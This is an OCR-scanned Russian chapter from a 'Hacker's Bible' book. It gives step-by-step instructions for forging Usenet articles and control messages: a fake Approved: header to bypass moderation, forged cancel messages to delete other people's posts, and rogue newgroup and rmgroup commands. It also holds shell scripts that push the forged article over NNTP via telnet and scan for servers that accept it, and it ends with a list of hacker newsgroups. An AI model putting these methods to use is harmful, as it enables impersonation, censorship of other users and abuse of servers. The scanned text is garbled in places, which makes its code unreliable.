БИБЛИЯ ХАКЕРА

Как подделать регистрацию и контрольные сообщения к конференциям Usenet

Сохраните любую статью для новостей в виде файла. В приведен­ном ниже примере этот файл называется hak. Отредактируйте hak, и уда­лите все строки, содержащие заголовки:

From some! random! path! user

(примечание: "From ", но не "From: "II) Article: Lines: Xref:

«Укоротите» Path: header до двух или трех последних bangized ком­понентов. Это позволит данным новой регистрации статьи стать похожи­ми на данные первоначальной (действительной) регистрации.

Другой вариант: вы можете создать полностью новый Path: line. Сделайте некоторые изменения в Идентификаторе сообщений (Message - ID): это поле не должно где-либо еще дублироваться. Лучше всего выпол­нить эту операцию, добавив пару произвольных символов к части адреса

Перед @. Обратите внимание на то, что программы новостей обычно ис­пользуют поля фиксированной длины для создания своих ГО.

Как угодно можно изменить и другие заголовки: From:, Newsgroups:, Sender: и т. д. Замените первоначальный текст на ваше сообщение. Если вы регистрируетесь в модерируемой группе новостей, не забудьте вклю­чить Approved: заголовок, позволяющий обойти механизм модерирова - ния.

Для ТОГО, чтобы специально уничтожить чью-либо статью, вам необходим соответствующий message-ID. Вводимые вами заголовки со­общения, в дополнение к уже существующим, должны содержать следу­ющие моменты, делающие message-ID так называемым сообщением уп­равления.

Важно: Сообщения управления обычно требуют заголовок Appro - так что если его нет, то вы должны его добавить. Subject: cmsg cancel <Xb8700A@twits. site. com> Control: cancel <Xb8700A@twits. site. com> Approved: Luser@twits. site. com

Конференции Usenet создаются и уничтожаются также с помощью сообщений управления. Если вы хотите создать, например, microsoft. sucks, ваши управляющие заголовки должны быть примерно следующими:

Subject: cmsg newgroup сотр. misc. microsoft. sucks Control: newgroup сотр. misc. microsoft. sucks

Если вы хотите создать группу, «модерируемую без модератора» (например, alt. hackers), прибавьте в конце «модерируемую» строку. Где - нибудь в теле вашего сообщения должен присутствовать следующий текст (соответствующий описанию создаваемой группы): For your newsgroups file: сотр. misc. microsoft, sucks We don't do windows

Чтобы удалить группу, замените newgroup на rmgroup в указанных выше строках (заголовка). Имейте в виду, что на большинстве сайтов все запросы выполняются через оператора новостей, который реша­

Ет, подтвердить или не подтвердить удаление. В большинстве установок. создание групп, в отличие от их удаления — процесс автоматический. Лю­бое изменение, вносимое в группы конференций, имеет больше шансов на успех, если имя является аппаратным для большинства уп­

Равления NNTP. Поэтому рекомендуется использование заголовков From: и Approved:, аналогичных установочным.

Теперь сохраните вашу статью, предварительно проверив, что она не содержит ссылок на вас лично или на ваш сайт, и перешлите все это

Дело вашему любимому NNTP серверу, который со своей стороны обес­печит передачу, используя команду IHAVE и следующий протокол: #! /bin/sh ## Post an article via IHAVE. ## args: filename server if test "$2" = "" ; then echo usage: $0 filename server exit 1

Fi

If test! - f $1 ; then echo $1: not found exit 1

Fi

# suck msg-id out of headers, keep the brackets msgid='sed - e '/"$/.$d' $1 | egrep '"[Mm]essage-[Ii][Dd]: ' | sed 's/. *-[Ii][Dd]: //'' echo $msgid ( sleep 5

Echo IHAVE $msgid sleep 5 cat $1 sleep 1

Echo sleep 1

Echo QUIT ) | telnet $2 119

Если в течение двух-трех дней ваша статья не появится, попробуй­те переслать ее на другой сервер. Найти сервер просто. Вот сценарий, ко­торый разобьет большой файл с сохраненными в нем netnews на список доступных хостов. Если хотите, то можете отредактировать результат, уда­лить личные имена и прочий хлам. #! /bin/sh FGV='fgrep -i - v'

Egrep '"Path: ' $1 | sed -e 's/~Path: //' - e 's/!/ /g' | sort - u | fgrep. | $FGV. bitnet | $FGV. uucp Если у вас уже есть список хостов, добавьте его к следующему сце­нарию:

#! /bin/sh while read xx ; do if test "$xx" = "" ; then continue; fi

Echo === $xx ( echo open $xx 119 sleep 5

Echo ihave IamS0k001@podunk. edu

Sleep 4 echo. echo quit sleep 1 echo quit ) | telnet done

Если вышеупомянутый сценарий называется findem, и вы использу­ете csh, то надо добавить

Findem < list >& outfile так, чтобы фиксировался весь вывод из telnet. Все это занимает $ремя, и по его окончании надо отредактировать outfile и найти местонахождение 335. Эта метка ответов из серверов, которые могли бы принять предлага­емую статью. Этот индикатор не полностью надежен, некоторые серверы его сразу принимают, а позднее удаляют статьи. «Опробуйте» такой сер­вер, повторяя несколько раз с небольшими изменениями какие-нибудь чужие сообщения, и посмотрите, появятся ли в конечном счете они на сервере.

Иногда telnet подвисает, особенно когда хост не поддерживает NNTP соединение. Если вы вручную уничтожите эти зависшие telnet про­цессы, не трогая основной сценарий (протокол), то сценарий продвинет­ся. Другими словами, вам, по всей видимости, придется постоянно кон­тролировать выполнение сценария.

Обратите внимание на другие серверы, которые не обязательно примут но скажут posting ok. Вы можете регулярно регистриро­

Ваться в них, но они добавляют в заголовок, со­

Держащий исходные данные вашего компьютера, и, следовательно, этот тип серверов не подходит для анонимного использования.

Хакерские конференции

В любом случае, помните, что источник каждой поступающей ста­тьи регистрируется. Поэтому нет никакого смысла уничтожать статьи UUnet. Это информация для начинающих хакеров. А для более умудрен­ных опытом отметим, что не нужно заходить в случайные группы, метить статьи и стирать сообщения. Это невежливо и бессмысленно. Зачем поль­зоваться несовершенными методами работы Usenet?!

Alt.2600.hope. tech

Хакеры планеты Земля.

Alt.comp. virus

Споры по вирусам.

Alt.cracks

Жаркие споры взломщиков сетей.

Alt.cyberpunk

Узкий круг киберпанков.

Alt.cyberspace

Киберпространство и как в нем работать. Alt. dcom. telecom

Споры относительно телекоммуникаций. Alt. fan. lewiz

Фэн-клуб Левиса Де Пайна.

Alt.hackers

Описание проектов.

Alt.hackers-malicious

Действительно мерзкие типы.

Alt. privacy, anon-server

Анонимные атаки на различные сервера.

Alt. radio, pirate

Скрытые механизмы.

Alt.radio. scanner

Сканирование радиограмм.

Alt.satellite. tv. europe

Все относительно европейского телевидения.

Alt.security

Безопасность компьютерных сетей.

Alt.security. keydist

Обмен ключами для систем дешифровки.

Alt. security. pgp

Pretty Good Privacy.

Alt. security. ripem

Нелегальная почта.

Сотр. org. cpsr. announce

Компьютерные профессионалы.

Comp. org. cpsr. talk

Самиздатовские компьютерные издания.

Сотр.org. eff. news

Новости от Electronic Frontiers Foundation.

Comp. protocols. tcp-ip

Протоколы TCP и IP.

Сотр. risks

Публикации и риск.

Сотр. security.announce

Анонсы от CERT относительно безопасности.

Сотр. security.misc

Безопасность сетей и компьютеров.

Сотр. security, unix

Дискуссии по защите великой и могучей UNIX. сотр. virus

Компьютерные вирусы и безопасность.

Rec. video. cable-tv

Кабельное телевидение.

Sci. crypt.

Различные методы шифровки/дешифровки.